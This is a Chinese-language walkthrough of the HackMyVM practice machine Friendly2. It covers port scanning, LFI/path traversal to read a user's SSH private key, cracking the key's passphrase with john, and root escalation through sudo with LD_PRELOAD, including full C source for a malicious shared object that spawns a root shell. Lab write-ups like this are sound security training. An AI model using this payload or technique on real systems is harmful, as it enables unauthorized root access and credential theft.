Hackmyvm friendly2
简介
难度:简单
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Friendly2
基本信息
kali: 192.168.194.9
靶机: 192.168.194.18
扫描
基础扫描的部分都相同,直接nmap扫描端口。nmap -sT -sV -A -T4 $ip -p- -Pn
在gobuster扫描url路径
看到有个tools的路径,访问试试
西班牙语,翻译看看有啥用
感觉翻译的内容没什么特别的含义,再看看源代码有什么可以挖掘的
找到一个check_if_exist.php文件尝试访问下
显示的是html似乎是靶机上的文件,试试有没有目录穿越、LFI。
确实可以,访问到敏感文件,那么看看gh0st用户目录下有没有ssh私钥可以读取
ok,读取到ssh私钥,保存下来,直接连接登录!
欸,还有个ssh登录的密码,用john爆破下哈希
成功登录!
提权
查看sudo命令
看到security.sh文件sudo执行的时候,可以进行setenv设置,因此可以利用环境变量来进行提权
有两种方式,一种直接通过LD_PRELOAD变量来进行提权
执行命令sudo LD_PRELOAD=/tmp/pe.so /opt/secutiry.sh进行提权
编译命令: gcc -fPIC -shared -o pe.so pe.c -nostartfiles 文件内容如下
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
第二种通过加载变量PATH进行提权
提权后,查看root下的flag
被加密,前面的加密脚本可以进行解密,修改输入限制长度
